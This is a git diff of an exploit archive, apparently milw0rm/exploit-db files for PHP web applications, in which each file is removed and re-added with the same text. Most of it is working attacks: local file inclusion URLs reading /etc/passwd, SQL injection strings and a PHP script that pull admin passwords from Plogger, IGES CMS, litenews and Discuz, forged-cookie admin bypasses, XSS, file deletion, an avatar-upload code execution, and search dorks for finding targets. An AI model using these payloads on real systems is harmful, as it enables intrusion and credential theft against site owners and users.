Local File Inclusion +[+] Discovered By SirGod +[+] www.mortal-team.com +[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin +[+] also ToxicBlood,MesSiAH,xZu +###################################### + +Example : + +http://localhost/x/index.php?page=../../../autoexec.bat + +This will open autoexec.bat . + +########################################### + +# milw0rm.com [2008-08-03] diff --git a/platforms/php/webapps/6203.txt b/platforms/php/webapps/6203.txt index fc63cf558..5bebfe0f2 100755 --- a/platforms/php/webapps/6203.txt +++ b/platforms/php/webapps/6203.txt 
@@ -1,52 +1,52 @@ - ######################################################################## - # # - # ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::... # - ######################################################################## - -Virangar Security Team - -www.virangar.net - --------- -Discoverd By :Virangar Security Team (hadihadi) - -special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra - -& all virangar members & all iranian hackerz - -greetz:to my best friend in the world hadi_aryaie2004 -& my lovely friend arash(imm02tal) from ISCN ------------------------------------ -Download: http://www.dayfoxdesigns.co.nr -Dork:Powered by Dayfox Designs This is a port of WordPress -------------------------------------------------------------------------------------------------- -vuln codes in index.php: -############line 140-144################## -if (isset($_GET["cat"])) { - $page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt'; - if (file_exists($page)) { - echo "
    < Back"; - @include ("$page"); -############line 173-178################### -if (isset($_GET["p"])) { - $page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt'; - $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt'; - if (file_exists($page)) { - echo '
    < Back'; - include ("$page"); -############line 209-213################## -if (isset($_GET["archive"])) { - $page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt'; - if (file_exists($page)) { - echo '
    < Back'; - include ("$page"); ----------------------------------------------------------------------------------------------------- - -exploit: -http://site.com/index.php?p=../../../../../../../etc/passwd%00 -http://site.com/index.php?cat=../../../../../../../etc/passwd%00 -http://site.com/index.php?archive=../../../../../../../etc/passwd%00 --------- -young iranian h4ck3rz - -# milw0rm.com [2008-08-04] + ######################################################################## + # # + # ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::... # + ######################################################################## + +Virangar Security Team + +www.virangar.net + +-------- +Discoverd By :Virangar Security Team (hadihadi) + +special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra + +& all virangar members & all iranian hackerz + +greetz:to my best friend in the world hadi_aryaie2004 +& my lovely friend arash(imm02tal) from ISCN +----------------------------------- +Download: http://www.dayfoxdesigns.co.nr +Dork:Powered by Dayfox Designs This is a port of WordPress +------------------------------------------------------------------------------------------------- +vuln codes in index.php: +############line 140-144################## +if (isset($_GET["cat"])) { + $page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt'; + if (file_exists($page)) { + echo "
    < Back"; + @include ("$page"); +############line 173-178################### +if (isset($_GET["p"])) { + $page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt'; + $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt'; + if (file_exists($page)) { + echo '
    < Back'; + include ("$page"); +############line 209-213################## +if (isset($_GET["archive"])) { + $page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt'; + if (file_exists($page)) { + echo '
    < Back'; + include ("$page"); +---------------------------------------------------------------------------------------------------- + +exploit: +http://site.com/index.php?p=../../../../../../../etc/passwd%00 +http://site.com/index.php?cat=../../../../../../../etc/passwd%00 +http://site.com/index.php?archive=../../../../../../../etc/passwd%00 +-------- +young iranian h4ck3rz + +# milw0rm.com [2008-08-04] diff --git a/platforms/php/webapps/6204.txt b/platforms/php/webapps/6204.txt index a7823dfb5..a1b597edc 100755 --- a/platforms/php/webapps/6204.txt +++ b/platforms/php/webapps/6204.txt 
@@ -1,119 +1,119 @@ -########################################################## -# GulfTech Security Research August 05, 2008 -########################################################## -# Vendor : Mike Johnson -# URL : http://www.plogger.org/ -# Version : Plogger <= 3.0 -# Risk : SQL Injection -########################################################## - - -Description: -Plogger is a popular online gallery tool written in php that -allows users to create an online gallery. It is vulnerable to -SQL Injection issues, which also allow for arbitrary file -disclosure since certain data from the returned SQL results is -used as a filename argument when calling file_get_contents(). -Together these issues can be used to completely take over the -vulnerable Plogger application. All users should upgrade their -Plogger installations as soon as possible. - - - -SQL Injection: -There are a number of SQL Injection issues within plogger. The -issues can be found in plog-download.php, and plog-remote.php -As mentioned earlier this issue also allows for the download -of arbitrary files on the target web server. - -elseif($type == "album" || $type == "search"){ -foreach ($checked as $pid){ - $query = "SELECT * FROM `".TABLE_PREFIX."pictures` WHERE `id`='".$pid."'"; - $result = run_query($query); - - while ($row = mysql_fetch_assoc($result)){ - $file_contents = file_get_contents("images/".$row["path"], true); - $zipfile -> add_file($file_contents, $row["path"]); - } - } -} - -The above code comes from plog-download.php @ lines 285-297 -and shows how both SQL Injection and arbitrary file access are -possible via the same flaw. The "checked" variable is taken -directly from $_REQUEST['checked'] and never get's sanitized. -The issues in plog-remote.php are similar and basically come -down to the various commands sending unsanitized gpc variables -to the get_album_by_name() function. 
The only commands within -plog-remote.php that are not vuln are "fetch-albums" and "login" - -/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat -(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0 -,0,0 FROM plogger_config/* - -The above url would successfully download the admin credentials -in the form of a zip file. To read arbitrary files on the server -vs reading admin credentials an attacker simply need to supply -the relative location of a file on the webserver in place of the -data in the first column of the union select above. It is also -worth mentioning that once an attacker has admin access, executing -arbitrary code is very much possible by updating the "theme_dir" -settings in the database to include an arbitrary path to an -uploaded image, that is terminated with a null byte. - -// insert into database -$new_theme_dir = basename($_REQUEST["activate"]); -$metafile = $config['basedir'] . '/themes/' . $new_theme_dir . '/meta.php'; -if (file_exists($metafile)) { - include($metafile); - $sql = 'UPDATE '.TABLE_PREFIX.'config SET `theme_dir` = \''.$new_theme_dir.'\''; - $name = $theme_name . ' ' . $version; - if (mysql_query($sql)) { - $output .= '

    ' . sprintf(plog_tr("Activated New Theme - %s"),$name). '

    '; - } else { - $output .= '

    ' . plog_tr("Error Activating Theme!") . '

    '; - }; - - // update config variable if page doesn't refresh - $config["theme_dir"] = $new_theme_dir; -} else { - $output .= '

    ' . plog_tr("No such theme") . '

    '; -}; - -The above code comes from /admin/plog-themes.php @ lines 40-57 and -shows a possible avenue for attackers to use in order to update the -'theme_dir' in the database. The only trick to this is we have make -the "activate" parameter pass both the file_exists() check, the -basename() check, and still have it update the "theme"dir" data in -the database with our arbitrary file path. - -/admin/plog-themes.php?activate=%00', `theme_dir` = concat -(feed_title,char(0)) -- * - -The above url will successfully copy the data that is contained -within the "feed_title" column in the database to the "theme_dir" -column, while at the same time passing both sanity checks. The -"feed_title" column can be updated from the main administrative -options and gladly accepts our arbitrary traversed file path leading -to the image file containing malicious php code. Since the first byte -of our "activate" parameter contains a null byte the file_exists() -check only sees "/themes/" as the path, instead of the data contained -in the "activate" parameter, and thus passes the file_exists() check. -I terminate the above query with " -- " vs "/*" since the basename() -function will cause problems if we terminate the query this way due -to the backslash that would be used in the query termination. - - - -Solution: -Fixes for the issues mentioned in this advisory are already available -via the Plogger public SVN, and a new version of Plogger which also -addresses these issues will be available later in the week. 
- - - -Credits: -James Bercegay of the GulfTech Security Research Team - -# milw0rm.com [2008-08-05] +########################################################## +# GulfTech Security Research August 05, 2008 +########################################################## +# Vendor : Mike Johnson +# URL : http://www.plogger.org/ +# Version : Plogger <= 3.0 +# Risk : SQL Injection +########################################################## + + +Description: +Plogger is a popular online gallery tool written in php that +allows users to create an online gallery. It is vulnerable to +SQL Injection issues, which also allow for arbitrary file +disclosure since certain data from the returned SQL results is +used as a filename argument when calling file_get_contents(). +Together these issues can be used to completely take over the +vulnerable Plogger application. All users should upgrade their +Plogger installations as soon as possible. + + + +SQL Injection: +There are a number of SQL Injection issues within plogger. The +issues can be found in plog-download.php, and plog-remote.php +As mentioned earlier this issue also allows for the download +of arbitrary files on the target web server. + +elseif($type == "album" || $type == "search"){ +foreach ($checked as $pid){ + $query = "SELECT * FROM `".TABLE_PREFIX."pictures` WHERE `id`='".$pid."'"; + $result = run_query($query); + + while ($row = mysql_fetch_assoc($result)){ + $file_contents = file_get_contents("images/".$row["path"], true); + $zipfile -> add_file($file_contents, $row["path"]); + } + } +} + +The above code comes from plog-download.php @ lines 285-297 +and shows how both SQL Injection and arbitrary file access are +possible via the same flaw. The "checked" variable is taken +directly from $_REQUEST['checked'] and never get's sanitized. +The issues in plog-remote.php are similar and basically come +down to the various commands sending unsanitized gpc variables +to the get_album_by_name() function. 
The only commands within +plog-remote.php that are not vuln are "fetch-albums" and "login" + +/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat +(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0 +,0,0 FROM plogger_config/* + +The above url would successfully download the admin credentials +in the form of a zip file. To read arbitrary files on the server +vs reading admin credentials an attacker simply need to supply +the relative location of a file on the webserver in place of the +data in the first column of the union select above. It is also +worth mentioning that once an attacker has admin access, executing +arbitrary code is very much possible by updating the "theme_dir" +settings in the database to include an arbitrary path to an +uploaded image, that is terminated with a null byte. + +// insert into database +$new_theme_dir = basename($_REQUEST["activate"]); +$metafile = $config['basedir'] . '/themes/' . $new_theme_dir . '/meta.php'; +if (file_exists($metafile)) { + include($metafile); + $sql = 'UPDATE '.TABLE_PREFIX.'config SET `theme_dir` = \''.$new_theme_dir.'\''; + $name = $theme_name . ' ' . $version; + if (mysql_query($sql)) { + $output .= '

    ' . sprintf(plog_tr("Activated New Theme + %s"),$name). '

    '; + } else { + $output .= '

    ' . plog_tr("Error Activating Theme!") . '

    '; + }; + + // update config variable if page doesn't refresh + $config["theme_dir"] = $new_theme_dir; +} else { + $output .= '

    ' . plog_tr("No such theme") . '

    '; +}; + +The above code comes from /admin/plog-themes.php @ lines 40-57 and +shows a possible avenue for attackers to use in order to update the +'theme_dir' in the database. The only trick to this is we have make +the "activate" parameter pass both the file_exists() check, the +basename() check, and still have it update the "theme"dir" data in +the database with our arbitrary file path. + +/admin/plog-themes.php?activate=%00', `theme_dir` = concat +(feed_title,char(0)) -- * + +The above url will successfully copy the data that is contained +within the "feed_title" column in the database to the "theme_dir" +column, while at the same time passing both sanity checks. The +"feed_title" column can be updated from the main administrative +options and gladly accepts our arbitrary traversed file path leading +to the image file containing malicious php code. Since the first byte +of our "activate" parameter contains a null byte the file_exists() +check only sees "/themes/" as the path, instead of the data contained +in the "activate" parameter, and thus passes the file_exists() check. +I terminate the above query with " -- " vs "/*" since the basename() +function will cause problems if we terminate the query this way due +to the backslash that would be used in the query termination. + + + +Solution: +Fixes for the issues mentioned in this advisory are already available +via the Plogger public SVN, and a new version of Plogger which also +addresses these issues will be available later in the week. + + + +Credits: +James Bercegay of the GulfTech Security Research Team + +# milw0rm.com [2008-08-05] diff --git a/platforms/php/webapps/6205.txt b/platforms/php/webapps/6205.txt index 57b5ae736..ecdb355d2 100755 --- a/platforms/php/webapps/6205.txt +++ b/platforms/php/webapps/6205.txt 
@@ -1,62 +1,62 @@ -########################## www.BugReport.ir ####################################### -# -# AmnPardaz Security Research Team -# -# Title: IGES CMS <=2.0 Multiple Vulnerabilities -# Vendor: www.iges.nl -# Exploit: Available -# Vulnerable Version: 2.0 -# Impact: High -# Fix: N/A -################################################################################### - -#################### -1. Description: -#################### - - IGES CMS is a complete, fully featured CMS in PHP language with SQL and became a powerful CMS having plenty of strong modules. - This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites. - -#################### -2. Vulnerabilities: -#################### - - 2.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter. - 2.1.1. Exploit: - Check the exploit/POC section. - 2.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter. - 2.2.1. Exploit: - Check the exploit/POC section. - -#################### -3. Exploits/POCs: -#################### - -1. Exploits/POCs: - 1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter. - ------------- - Find Admin's password: - http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/* - http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/* - ------------- - 1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter. - ------------- - http://[URL]/links.php?cat= - ------------- - -#################### -4. Solution: -#################### - - Edit the source code to ensure that inputs are properly sanitized. - -#################### -5. 
Credit: -#################### - -AmnPardaz Security Research & Penetration Testing Group -Contact: admin[4t}bugreport{d0t]ir -WwW.BugReport.ir -WwW.AmnPardaz.com - -# milw0rm.com [2008-08-05] +########################## www.BugReport.ir ####################################### +# +# AmnPardaz Security Research Team +# +# Title: IGES CMS <=2.0 Multiple Vulnerabilities +# Vendor: www.iges.nl +# Exploit: Available +# Vulnerable Version: 2.0 +# Impact: High +# Fix: N/A +################################################################################### + +#################### +1. Description: +#################### + + IGES CMS is a complete, fully featured CMS in PHP language with SQL and became a powerful CMS having plenty of strong modules. + This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites. + +#################### +2. Vulnerabilities: +#################### + + 2.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter. + 2.1.1. Exploit: + Check the exploit/POC section. + 2.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter. + 2.2.1. Exploit: + Check the exploit/POC section. + +#################### +3. Exploits/POCs: +#################### + +1. Exploits/POCs: + 1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter. + ------------- + Find Admin's password: + http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/* + http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/* + ------------- + 1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter. + ------------- + http://[URL]/links.php?cat= + ------------- + +#################### +4. Solution: +#################### + + Edit the source code to ensure that inputs are properly sanitized. 
+ +#################### +5. Credit: +#################### + +AmnPardaz Security Research & Penetration Testing Group +Contact: admin[4t}bugreport{d0t]ir +WwW.BugReport.ir +WwW.AmnPardaz.com + +# milw0rm.com [2008-08-05] diff --git a/platforms/php/webapps/6206.txt b/platforms/php/webapps/6206.txt index 4ee0c65b7..21ed367d2 100755 --- a/platforms/php/webapps/6206.txt +++ b/platforms/php/webapps/6206.txt 
@@ -1,33 +1,33 @@ -######################################################################### -# # -# litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability # -# # -######################################################################### -# # -# AUTHOR : Scary-Boys # -# HOME : http://scary-boys.com # -# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations -# # -######################################################################### -# # -# DorKs : "Powered By litenews" # -# # -######################################################################### -# # -# DESCRIPTION : # -# Maian Guestbook suffers from a insecure cookie # -# the admin panel only checks if the cookie exists. # -# # -######################################################################### -# # -# Vulnerability : # -# # -# javascript:document.cookie = "admin=1; path=/"; # -# # -######################################################################### -# # -# after running the javascript, Go to "/admin/index.php" & Refresh # -# # -######################################################################### - -# milw0rm.com [2008-08-05] +######################################################################### +# # +# litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability # +# # +######################################################################### +# # +# AUTHOR : Scary-Boys # +# HOME : http://scary-boys.com # +# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations +# # +######################################################################### +# # +# DorKs : "Powered By litenews" # +# # +######################################################################### +# # +# DESCRIPTION : # +# Maian Guestbook suffers from a insecure cookie # +# the admin panel only checks if the cookie exists. 
# +# # +######################################################################### +# # +# Vulnerability : # +# # +# javascript:document.cookie = "admin=1; path=/"; # +# # +######################################################################### +# # +# after running the javascript, Go to "/admin/index.php" & Refresh # +# # +######################################################################### + +# milw0rm.com [2008-08-05] diff --git a/platforms/php/webapps/6207.txt b/platforms/php/webapps/6207.txt index dfb2034f8..e4083563e 100755 --- a/platforms/php/webapps/6207.txt +++ b/platforms/php/webapps/6207.txt @@ -1,12 +1,12 @@ -litenews-01 <= 1.2 Remote sql injection -# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations -# # -#Injection Adress : http://Sitename/litenew//index.php?mode=view&id= code sql - -you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17 - -C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870 - -http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/* - -# milw0rm.com [2008-08-05] +litenews-01 <= 1.2 Remote sql injection +# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations +# # +#Injection Adress : http://Sitename/litenew//index.php?mode=view&id= code sql + +you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17 + +C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870 + +http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/* + +# milw0rm.com [2008-08-05] 
diff --git a/platforms/php/webapps/6208.txt b/platforms/php/webapps/6208.txt index 429a20016..274153c94 100755 --- a/platforms/php/webapps/6208.txt +++ b/platforms/php/webapps/6208.txt @@ -1,19 +1,19 @@ -Author: otmorozok428, http://forum.antichat.ru - -Products: Wsn Forum <= 4.1.43, Wsn Knowledge Base <= 4.1.36, Wsn Links <= 4.1.44, Wsn Gallery <= 4.1.30 - -Vendor: http://www.webmastersite.net - -Googling: inurl:memberlist.php?action=profile - -Code Execution Vulnerability: - -Avatar evil.jpg source: - -Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID] - -See the avatar name at your profile. - -Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al - -# milw0rm.com [2008-08-06] +Author: otmorozok428, http://forum.antichat.ru + +Products: Wsn Forum <= 4.1.43, Wsn Knowledge Base <= 4.1.36, Wsn Links <= 4.1.44, Wsn Gallery <= 4.1.30 + +Vendor: http://www.webmastersite.net + +Googling: inurl:memberlist.php?action=profile + +Code Execution Vulnerability: + +Avatar evil.jpg source: + +Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID] + +See the avatar name at your profile. + +Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al + +# milw0rm.com [2008-08-06] diff --git a/platforms/php/webapps/6213.txt b/platforms/php/webapps/6213.txt index 675b8b3d4..42e589f51 100755 --- a/platforms/php/webapps/6213.txt +++ b/platforms/php/webapps/6213.txt 
@@ -1,33 +1,33 @@ -######################################################################### -# # -#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability# -# # -######################################################################### -# # -# AUTHOR : Scary-Boys # -# HOME : http://scary-boys.com # -# Founded By : lvlr-Erfan # -# Download : http://www.fhm-script.com/download.php # -# # -######################################################################### -# # -# DorKs : "Powered By Free Hosting Manager" # -# # -######################################################################### -# # -# DESCRIPTION : # -# the admin panel only checks if the cookie exists. # -# # -######################################################################### -# # -# Vulnerability : # -# # -# javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/"; -# # -######################################################################### -# # -# after running the javascript, Go to "/admin" & Refresh # -# # -######################################################################### - -# milw0rm.com [2008-08-06] +######################################################################### +# # +#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability# +# # +######################################################################### +# # +# AUTHOR : Scary-Boys # +# HOME : http://scary-boys.com # +# Founded By : lvlr-Erfan # +# Download : http://www.fhm-script.com/download.php # +# # +######################################################################### +# # +# DorKs : "Powered By Free Hosting Manager" # +# # +######################################################################### +# # +# DESCRIPTION : # +# the admin panel only checks if the cookie exists. 
# +# # +######################################################################### +# # +# Vulnerability : # +# # +# javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/"; +# # +######################################################################### +# # +# after running the javascript, Go to "/admin" & Refresh # +# # +######################################################################### + +# milw0rm.com [2008-08-06] diff --git a/platforms/php/webapps/6214.php b/platforms/php/webapps/6214.php index ab9a4d7d4..c399cda7c 100755 --- a/platforms/php/webapps/6214.php +++ b/platforms/php/webapps/6214.php 
@@ -1,51 +1,51 @@ -=5 & mysql>=4.1 -BY james -+------------------------------------------------------------------+ -"); - -if($argc>4) -{ - $host=$argv[1]; - $port=$argv[2]; - $path=$argv[3]; - $uid=$argv[4]; -}else{ - echo "Usage: php ".$argv[0]." host port path uid\n"; - echo "host: target server \n"; - echo "port: the web port, usually 80\n"; - echo "path: path to discuz\n"; - echo "uid : user ID you wanna get\n"; - echo "Example:\r\n"; - echo "php ".$argv[0]." localhost 80 1\n"; - exit; -} - -$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit"; - -$data = "POST /".$path."/index.php"." HTTP/1.1\r\n"; -$data .= "Accept: */*\r\n"; -$data .= "Accept-Language: zh-cn\r\n"; -$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; -$data .= "User-Agent: wap\r\n"; -$data .= "Host: ".$host."\r\n"; -$data .= "Content-length: ".strlen($content)."\r\n"; -$data .= "Connection: Close\r\n"; -$data .= "\r\n"; -$data .= $content."\r\n\r\n"; -$ock=fsockopen($host,$port); -if (!$ock) { - echo 'No response from '.$host; - die; -} -fwrite($ock,$data); -while (!feof($ock)) { - echo fgets($ock, 1024); -} -?> - -# milw0rm.com [2008-08-06] +=5 & mysql>=4.1 +BY james ++------------------------------------------------------------------+ +"); + +if($argc>4) +{ + $host=$argv[1]; + $port=$argv[2]; + $path=$argv[3]; + $uid=$argv[4]; +}else{ + echo "Usage: php ".$argv[0]." host port path uid\n"; + echo "host: target server \n"; + echo "port: the web port, usually 80\n"; + echo "path: path to discuz\n"; + echo "uid : user ID you wanna get\n"; + echo "Example:\r\n"; + echo "php ".$argv[0]." localhost 80 1\n"; + exit; +} + +$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit"; + +$data = "POST /".$path."/index.php"." 
HTTP/1.1\r\n"; +$data .= "Accept: */*\r\n"; +$data .= "Accept-Language: zh-cn\r\n"; +$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$data .= "User-Agent: wap\r\n"; +$data .= "Host: ".$host."\r\n"; +$data .= "Content-length: ".strlen($content)."\r\n"; +$data .= "Connection: Close\r\n"; +$data .= "\r\n"; +$data .= $content."\r\n\r\n"; +$ock=fsockopen($host,$port); +if (!$ock) { + echo 'No response from '.$host; + die; +} +fwrite($ock,$data); +while (!feof($ock)) { + echo fgets($ock, 1024); +} +?> + +# milw0rm.com [2008-08-06] diff --git a/platforms/php/webapps/6215.txt b/platforms/php/webapps/6215.txt index d18b9cba6..ff98a1306 100755 --- a/platforms/php/webapps/6215.txt +++ b/platforms/php/webapps/6215.txt @@ -1,44 +1,44 @@ -########################################################## -#Author : BeyazKurt -#Contact : Djm-sut@Hotmail.Com -# -#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ] -#Download : http://scripts.ringsworld.com/organizers/ppim.zip -# -# D0rk : inurl:events.php?listallevents -# -# File Delete Vulnerability: upload.php -# -# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx -# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName -# -# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -# -# XSS Vulnerability: events.php -# -#[CODE] -# New Event
    "; -# } -# ?> -#[/CODE] -# -#Exploit : -# events.php?mode=new&date=XSS CODE -# events.php?mode=new&date="> -# ------------------------------- -# -# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) -# pigs for dedication : : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! -# Proud 2 Be ALBANIAN -# -# MTK : 0 - 5 : FenerBahçe (H) -# -# Not : Fuck off pala! aq lameri. -# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate. -####################################################### - -# milw0rm.com [2008-08-10] +########################################################## +#Author : BeyazKurt +#Contact : Djm-sut@Hotmail.Com +# +#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ] +#Download : http://scripts.ringsworld.com/organizers/ppim.zip +# +# D0rk : inurl:events.php?listallevents +# +# File Delete Vulnerability: upload.php +# +# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx +# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName +# +# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ +# +# XSS Vulnerability: events.php +# +#[CODE] +# New Event
    "; +# } +# ?> +#[/CODE] +# +#Exploit : +# events.php?mode=new&date=XSS CODE +# events.php?mode=new&date="> +# ------------------------------- +# +# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) +# pigs for dedication : : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! +# Proud 2 Be ALBANIAN +# +# MTK : 0 - 5 : FenerBahçe (H) +# +# Not : Fuck off pala! aq lameri. +# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate. +####################################################### + +# milw0rm.com [2008-08-10] diff --git a/platforms/php/webapps/6223.php b/platforms/php/webapps/6223.php index 2235e948f..8df78f04f 100755 --- a/platforms/php/webapps/6223.php +++ b/platforms/php/webapps/6223.php @@ -1,54 +1,54 @@ - - -# milw0rm.com [2008-08-10] + + +# milw0rm.com [2008-08-10] diff --git a/platforms/php/webapps/6225.txt b/platforms/php/webapps/6225.txt index afa3bfcb9..5cb0baed4 100755 --- a/platforms/php/webapps/6225.txt +++ b/platforms/php/webapps/6225.txt 
@@ -1,48 +1,48 @@ - ############################################################################################### - # # - # ...:::::PHP-Ring Webring System v0.9.1 Insecure Cookie Handling Vulnerability ::::.... # - ############################################################################################### - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(hadihadi) - -special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra - -& all virangar members & all hackerz - -greetz:to my best friend in the world hadi_aryaie2004 -& my lovely friend arash(imm02tal) -------- -DESCRIPTION: -PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. ---- -vuln code in /admin/wr_admin.php - -$cookie = $_COOKIE[admin]; //check for cookie - -if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") { - include("../templates/wr_header.php"); - echo "Enter admin username and password to log in"; - .... - .... - .. - } else { -function adminhome() // load admin settings - ---- -exploit: -javascript:document.cookie = "admin=1; path=/"; ------ -now visit /admin and you can get admin access and manage the cms ;) -------- -young iranian h4ck3rz - -# milw0rm.com [2008-08-10] + ############################################################################################### + # # + # ...:::::PHP-Ring Webring System v0.9.1 Insecure Cookie Handling Vulnerability ::::.... 
# + ############################################################################################### + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(hadihadi) + +special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra + +& all virangar members & all hackerz + +greetz:to my best friend in the world hadi_aryaie2004 +& my lovely friend arash(imm02tal) +------- +DESCRIPTION: +PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. +--- +vuln code in /admin/wr_admin.php + +$cookie = $_COOKIE[admin]; //check for cookie + +if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") { + include("../templates/wr_header.php"); + echo "Enter admin username and password to log in"; + .... + .... + .. + } else { +function adminhome() // load admin settings + +--- +exploit: +javascript:document.cookie = "admin=1; path=/"; +----- +now visit /admin and you can get admin access and manage the cms ;) +------- +young iranian h4ck3rz + +# milw0rm.com [2008-08-10] diff --git a/platforms/php/webapps/6226.txt b/platforms/php/webapps/6226.txt index 606c8f334..086ed8df7 100755 --- a/platforms/php/webapps/6226.txt +++ b/platforms/php/webapps/6226.txt 
